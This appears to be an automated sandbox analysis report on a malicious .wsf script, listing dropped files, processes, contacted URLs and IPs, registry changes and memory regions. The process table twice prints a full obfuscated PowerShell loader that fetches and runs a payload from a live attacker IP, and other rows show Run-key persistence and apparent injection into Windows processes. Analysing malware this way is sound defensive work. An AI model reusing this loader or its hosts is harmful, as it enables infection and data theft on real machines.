Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Ordine_doc_419024001904.wsf
|
XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhjghg51.z0h.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s40pbzt4.vzk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd2ve3te.4le.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1idxvew.52z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\s5497I81
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Ballepresseres.Ine
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine_doc_419024001904.wsf"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function
adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries,
$Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt
'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0
0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp
:M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt
'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok
.$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola
(adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola
(adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt
');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F
o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc
rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb
a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt
' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p
4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola
(adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn
ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o
nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe
mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl
:sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt
e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r
aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5.0 8 0 )T ');Apalachicola $Karriererne158;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function
adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries,
$Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt
'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0
0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp
:M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt
'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok
.$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola
(adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola
(adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt
');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F
o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc
rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb
a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt
' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p
4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola
(adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn
ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o
nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe
mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl
:sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt
e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r
aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5.0 8 0 )T ');Apalachicola $Karriererne158;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe
|
"C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe"
|
|
|
|
C:\Windows\SysWOW64\AtBroker.exe
|
"C:\Windows\SysWOW64\AtBroker.exe"
|
|
|
|
C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe
|
"C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 5 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.tyaer.com/gnbc/?URw=Rnl4c&BP-t5v1=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==
|
47.91.88.207
|
|
|
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://87.121.105.163/icjFpYDkBweqyeZ252.binMinnsTjeduelvalenza.it/ka/icjFpYDkBweqyeZ252.bin
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
http://www.oyoing.com/gnbc/?BP-t5v1=C1gai5pWl56CEUX9IJicnlurrW3FMhatoBDmIFOQ7zGon0Xv0KBemEgaA/rlfkMV
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://87.121.105.163/icjFpYDkBweqyeZ252.bin1
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://87.121.105.163/icjFpYDkBweqyeZ252.binr
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
http://www.oyoing.com/;a3
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://87.121.105.163/Acariatre43.chm
|
87.121.105.163
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
http://87.121.105.163/icjFpYDkBweqyeZ252.binllI
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://87.121.105.163/Acariatre43.chmXR
|
unknown
|
||
|
http://87.121.105.163/icjFpYDkBwd
|
unknown
|
||
|
http://87.121.105.163/Acariatre43.chmP
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://87.121.105.163/icjFpYDkBweqyeZ252.bin;
|
unknown
|
||
|
http://87.121.105.163/icjFpYDkBweqyeZ252.bin
|
87.121.105.163
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
There are 28 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.tyaer.com
|
47.91.88.207
|
|
|
|
www.megabet303.lol
|
unknown
|
|
|
|
www.oyoing.com
|
127.0.0.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
47.91.88.207
|
www.tyaer.com
|
United States
|
|
|
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
127.0.0.1
|
www.oyoing.com
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
3FZ4SBL
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
20A50000
|
unclassified section
|
page execute and read and write
|
|
|
|
8350000
|
direct allocation
|
page execute and read and write
|
|
|
|
5962000
|
trusted library allocation
|
page read and write
|
|
|
|
1AE40151000
|
trusted library allocation
|
page read and write
|
|
|
|
8C08000
|
direct allocation
|
page execute and read and write
|
|
|
|
26B0000
|
unkown
|
page execute and read and write
|
|
|
|
2F00000
|
trusted library allocation
|
page read and write
|
|
|
|
2900000
|
system
|
page execute and read and write
|
|
|
|
DC0000
|
system
|
page execute and read and write
|
|
|
|
2F40000
|
trusted library allocation
|
page read and write
|
|
|
|
2E40000
|
system
|
page execute and read and write
|
|
|
|
A88000
|
heap
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page read and write
|
||
|
24B0000
|
unkown
|
page read and write
|
||
|
1527679C000
|
heap
|
page read and write
|
||
|
7E2C000
|
heap
|
page read and write
|
||
|
1527490E000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE300E1000
|
trusted library allocation
|
page read and write
|
||
|
15274936000
|
heap
|
page read and write
|
||
|
15276C02000
|
heap
|
page read and write
|
||
|
15274937000
|
heap
|
page read and write
|
||
|
15274992000
|
heap
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15274975000
|
heap
|
page read and write
|
||
|
26AE9510000
|
trusted library allocation
|
page read and write
|
||
|
1AE2E380000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
1AE308A2000
|
trusted library allocation
|
page read and write
|
||
|
4370000
|
heap
|
page read and write
|
||
|
1AE2E47E000
|
heap
|
page read and write
|
||
|
7D7E000
|
heap
|
page read and write
|
||
|
7A3097C000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
45DE000
|
stack
|
page read and write
|
||
|
15276779000
|
heap
|
page read and write
|
||
|
26AE99C4000
|
trusted library allocation
|
page read and write
|
||
|
15274951000
|
heap
|
page read and write
|
||
|
15274921000
|
heap
|
page read and write
|
||
|
152768C9000
|
heap
|
page read and write
|
||
|
1AE2E620000
|
trusted library allocation
|
page read and write
|
||
|
8390000
|
direct allocation
|
page read and write
|
||
|
2F8C000
|
heap
|
page read and write
|
||
|
4B83000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15274C55000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
430000
|
unkown
|
page readonly
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
18EA5B50000
|
heap
|
page read and write
|
||
|
1AE403CB000
|
trusted library allocation
|
page read and write
|
||
|
7DA8000
|
heap
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
18EA5810000
|
heap
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
420000
|
unkown
|
page readonly
|
||
|
D80000
|
unkown
|
page readonly
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
517F000
|
stack
|
page read and write
|
||
|
94D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4645000
|
heap
|
page execute and read and write
|
||
|
18EA5A10000
|
heap
|
page read and write
|
||
|
15274941000
|
heap
|
page read and write
|
||
|
1AE2E600000
|
trusted library allocation
|
page read and write
|
||
|
2D1C000
|
unkown
|
page read and write
|
||
|
DA7000
|
unkown
|
page readonly
|
||
|
26AE980E000
|
trusted library allocation
|
page read and write
|
||
|
513E000
|
stack
|
page read and write
|
||
|
4B9D000
|
heap
|
page read and write
|
||
|
6C44000
|
heap
|
page read and write
|
||
|
6F9C000
|
heap
|
page read and write
|
||
|
15276995000
|
heap
|
page read and write
|
||
|
152748A0000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
4B78000
|
heap
|
page read and write
|
||
|
287E000
|
stack
|
page read and write
|
||
|
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
|
26AE9821000
|
trusted library allocation
|
page read and write
|
||
|
2F6F000
|
unkown
|
page read and write
|
||
|
F88000
|
heap
|
page read and write
|
||
|
4E5C000
|
stack
|
page read and write
|
||
|
15274925000
|
heap
|
page read and write
|
||
|
8120000
|
heap
|
page read and write
|
||
|
910000
|
trusted library section
|
page read and write
|
||
|
843A000
|
heap
|
page read and write
|
||
|
2DB2000
|
heap
|
page read and write
|
||
|
206EB000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
B50000
|
unkown
|
page readonly
|
||
|
15276799000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
7D1F000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
15276900000
|
heap
|
page read and write
|
||
|
8136000
|
heap
|
page read and write
|
||
|
26AE99BE000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2DA8000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
15276997000
|
heap
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
6BAD000
|
stack
|
page read and write
|
||
|
1AE48420000
|
heap
|
page read and write
|
||
|
4B7A000
|
heap
|
page read and write
|
||
|
1AE31D3E000
|
trusted library allocation
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
7D65000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7D22000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
4D60000
|
heap
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
725D000
|
stack
|
page read and write
|
||
|
6F0E000
|
heap
|
page read and write
|
||
|
D20000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4C343FE000
|
stack
|
page read and write
|
||
|
6A90000
|
direct allocation
|
page read and write
|
||
|
7DE3000
|
heap
|
page read and write
|
||
|
719431D000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
800000
|
unkown
|
page readonly
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
2002E000
|
stack
|
page read and write
|
||
|
4A4E000
|
stack
|
page read and write
|
||
|
4B71000
|
heap
|
page read and write
|
||
|
8427000
|
heap
|
page read and write
|
||
|
5E9000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276914000
|
heap
|
page read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
7D8C000
|
heap
|
page read and write
|
||
|
459E000
|
stack
|
page read and write
|
||
|
1411000
|
unkown
|
page readonly
|
||
|
5AB000
|
stack
|
page read and write
|
||
|
834E000
|
stack
|
page read and write
|
||
|
715C000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
15276C05000
|
heap
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
1AE2FE10000
|
trusted library allocation
|
page read and write
|
||
|
4E1A000
|
stack
|
page read and write
|
||
|
7EBF000
|
stack
|
page read and write
|
||
|
828D000
|
stack
|
page read and write
|
||
|
152768E8000
|
heap
|
page read and write
|
||
|
CA1000
|
unkown
|
page readonly
|
||
|
1527491B000
|
heap
|
page read and write
|
||
|
24E0000
|
heap
|
page read and write
|
||
|
18EA5B55000
|
heap
|
page read and write
|
||
|
4B51000
|
heap
|
page read and write
|
||
|
5719000
|
trusted library allocation
|
page read and write
|
||
|
2A53000
|
unkown
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
8330000
|
trusted library allocation
|
page read and write
|
||
|
22691000
|
unclassified section
|
page execute and read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
7ED000
|
stack
|
page read and write
|
||
|
26AE7D30000
|
heap
|
page read and write
|
||
|
813E000
|
heap
|
page read and write
|
||
|
4D50000
|
heap
|
page read and write
|
||
|
44AE000
|
stack
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
1AE2FF34000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7D6A000
|
heap
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
31BF000
|
stack
|
page read and write
|
||
|
8430000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1527699D000
|
heap
|
page read and write
|
||
|
2E40000
|
direct allocation
|
page read and write
|
||
|
4358000
|
remote allocation
|
page execute and read and write
|
||
|
8320000
|
trusted library allocation
|
page read and write
|
||
|
DA7000
|
unkown
|
page readonly
|
||
|
2E40000
|
direct allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2E5E000
|
stack
|
page read and write
|
||
|
15276770000
|
heap
|
page read and write
|
||
|
7D29000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
7D18000
|
heap
|
page read and write
|
||
|
C8E000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1FF82B90000
|
heap
|
page read and write
|
||
|
2E5E000
|
unkown
|
page read and write
|
||
|
871000
|
unkown
|
page readonly
|
||
|
7F25000
|
trusted library allocation
|
